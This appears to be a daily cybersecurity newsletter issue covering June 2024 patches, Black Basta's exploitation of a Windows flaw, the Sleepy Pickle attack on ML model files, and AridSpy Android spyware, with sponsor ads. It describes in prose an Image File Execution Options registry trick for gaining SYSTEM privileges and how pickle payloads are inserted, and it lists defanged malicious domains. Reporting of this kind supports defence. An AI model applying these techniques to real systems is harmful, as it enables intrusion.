Jun 14 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter thatβs got that Friday feeling π₯³π₯³π₯³
Itβs Friday, folks, which can only mean one thingβ¦ Itβs time for our weekly segment!
It goes by many names. Patch of the Week, Tweak of the week. Okay, thatβs it.
Congrats, the cybercriminals are no matchβ¦ for your patch! π©Ήπ©Ήπ©Ή
π¨ Microsoft Patch Tuesday: June 2024 π‘οΈ
Microsoft released security updates fixing 51 flaws, including one Critical and 50 Important. π οΈπ This also includes 17 fixes for the Edge browser. The most severe flaw (CVE-2024-30080) is a remote code execution (RCE) issue in MSMQ (CVSS 9.8). π₯οΈπ₯ None of the flaws have been actively exploited yet. Notably, CVE-2023-50868 affects DNSSEC validation, causing CPU exhaustion. Other vendors like Adobe, AWS, and Google also issued security updates. ππ
Google doesnβt Play, baby π«
π¨ Google Pixel June Security Update: Critical Fixes and New Features! π§
Google's June Pixel update includes multiple critical fixes and a high-severity vulnerability that "may be under limited, targeted exploitation." π¨ Update your devices now! In addition to security patches, this quarterly drop features new AI enhancements for Pixel 8 and 8a, despite hardware concerns. π±π€ Critical fixes address vulnerabilities that could allow local attackers to escalate privileges, potentially linking with other exploits. Meanwhile, the Android landscape remains risky, with reports of 90 malicious apps on Google Play, amassing over 5.5 million instals. β οΈπ
Now, on to todayβs hottest cybersecurity news stories:
π° Black Basta ransomware targets Windows zero-day flaw π
π₯ Sleepy Pickle is the ghost in the machine learning models π€
π Arid Viper just dropped its AridSpy mobile espionage move π΅π»ββοΈ
Threat actors linked to the Black Basta ransomware have exploited a privilege escalation flaw in the Microsoft Windows Error Reporting Service (CVE-2024-26169), which was patched in March 2024. This flaw, with a CVSS score of 7.8, allows attackers to gain SYSTEM privileges.
π‘οΈ Exploiting the Flaw
Symantec's analysis reveals that an exploit tool used in recent attacks could have been compiled before the patch, indicating zero-day exploitation. The threat group, tracked as Cardinal (aka Storm-1811 or UNC4393), uses Black Basta ransomware, often leveraging access obtained via QakBot and DarkGate.
π§ Attack Vectors
In recent attacks, Black Basta has used legitimate Microsoft tools like Quick Assist and Teams. They impersonate IT personnel to gain trust, leading to credential theft with EvilProxy, execution of batch scripts, and persistence via SystemBC.
π§ Technical Details
The exploit abuses the Windows file werkernel.sys's null security descriptor when creating registry keys. It creates a registry key at 'HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution OptionsWerFault.exe', setting the 'Debugger' value to its executable path, starting a shell with admin privileges.
π» Compilation and Use
The malicious tool was compiled on February 27, 2024, weeks before the patch, with another sample dated December 18, 2023. While altering timestamps is common to avoid detection, Symantec suggests fewer reasons for such in this case.
π οΈ Mitigation
Microsoft's fix from March 2024 protects against this flaw. Users are advised to apply the latest updates. Microsoft's security software also includes detections against the malware.
π Ransomware Trends
Ransomware attacks are on the rise, with a new family called DORRA (a Makop variant) emerging. Google-owned Mandiant reports a 75% increase in ransomware-related posts on data leak sites, with over $1.1 billion paid to attackers in 2023, up from $567 million in 2022.
"The resurgence in extortion activity is driven by the resettling of the cybercriminal ecosystem, new entrants, partnerships, and new ransomware service offerings," Mandiant noted.
Stay updated and secure! ππ
A new threat named "Sleepy Pickle" has emerged, highlighting the risks of the Pickle format used in machine learning (ML). Discovered by Trail of Bits, this technique corrupts ML models, posing severe supply chain risks.
π‘ What is Sleepy Pickle?
Sleepy Pickle is a novel attack targeting ML models, not the underlying system. It weaponizes the Pickle format, commonly used by ML libraries like PyTorch, to execute arbitrary code during deserialization.
π οΈ How It Works
Attackers insert a payload into a Pickle file using tools like Fickling and deliver it via adversary-in-the-middle (AitM) attacks, phishing, supply chain compromises, or system weaknesses. When the file is deserialized on a victimβs system, the payload executes, modifying the ML model in-place.
π Impact on ML Models
The payload can backdoor models, control outputs, or tamper with processed data. This can lead to harmful outputs, data theft, or manipulated summaries pointing to phishing pages. Sleepy Pickle can maintain undetected access, compromising models when the Pickle file is loaded in Python.
π§ Mitigation Strategies
Hugging Face recommends:
Loading models from trusted users and organisations.
Using signed commits.
Loading models from TensorFlow or Jax formats with the from_tf=True auto-conversion mechanism.
π Broader Attack Surface
Sleepy Pickle can corrupt local models if loaded together, broadening the attack surface. Control over any Pickle file in the supply chain can be enough to attack an organisationβs models, exploiting lower-level supply chain weaknesses.
π¨ Call to Action
Organisations must be vigilant about the sources of their ML models and the integrity of the files they load. Implementing robust security practices and staying updated with patches can help mitigate such advanced model-level attacks.
Stay secure and informed! ππ
Stay ahead of the curve with Presspool.ai! π Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." π€π‘ Thatβs us, alright! π€΅ How about you? Visionary AI executive, much? π
And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business π€π©βπ»π
Rest assured, the process is very straightforward.
You simply:
π Sign Up & Create Campaign
π Define your audience, budget, and message to captivate your audience.
π Launch your campaign, as Presspoolβs AI matches it with ideal newsletter audiences for optimal reach and conversions. π―
π΅οΈ Finally, you leverage real-time analytics to track performance and refine future strategies. π Elevate your marketing game and stay informed with Presspool.ai! π Simples! π¦¦
Presspool.aiΒ π°ππ€ may just have what you need to succeed. And if the product isnβt for you, the newsletter alone is a gamechanger. And we know newsletters π
The threat actor known as Arid Viper is behind a mobile espionage campaign using trojanized Android apps to deliver spyware called AridSpy. This malware is distributed through fake websites impersonating messaging apps, a job app, and a Palestinian Civil Registry app.
π± How It Works
ESET reports that AridSpyβs malicious code is added to legitimate apps, creating trojanized versions. These apps are distributed via dedicated websites. The activity spans five campaigns since 2022, with three still active. Arid Viper, also known as APT-C-23 and Desert Falcon, has targeted military personnel, journalists, and dissidents in the Middle East since 2017.
π§ Technical Details
AridSpy has evolved into a multi-stage trojan capable of downloading additional payloads from a command-and-control (C2) server. It targets users in Palestine and Egypt through fake apps like LapizaChat and a fraudulent Palestinian Civil Registry app.
π Websites and Apps
Palestinian Civil Registry: Hosted on palcivilreg[.]com, advertised via a Facebook page. The app mimics a legitimate app but uses the real server to retrieve information.
Job Opportunity App: Found on almoshell[.]website, registered in August 2023. Unlike other apps, it's not based on any legitimate application.
π‘οΈ How It Works
Initial Infection: Users download the trojanized app from a bogus site.
Payload Deployment: The app checks for security software and downloads a first-stage payload if none is found.
Persistent Threat: The first-stage payload downloads further components and remains active even if the initial app is uninstalled.
π₯ Spyware Capabilities
Data Harvesting: Gathers data from the device, deactivates itself, or performs exfiltration based on commands or specific triggers.
Surveillance: Takes pictures using the front camera if the phone is locked/unlocked, every 40 minutes if the battery is above 15%.
π¨ Stay Vigilant
AridSpyβs stealthy and persistent nature underscores the importance of downloading apps only from trusted sources. Be cautious of unfamiliar websites and apps, and ensure your device has robust security measures in place.
Stay informed and secure! ππ
ποΈ Extra, Extra! Read all about it! ποΈ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
π‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday π
π΅Β Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for π
πΒ Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πΎ
Let us know what you think.
So long and thanks for reading all the phish!
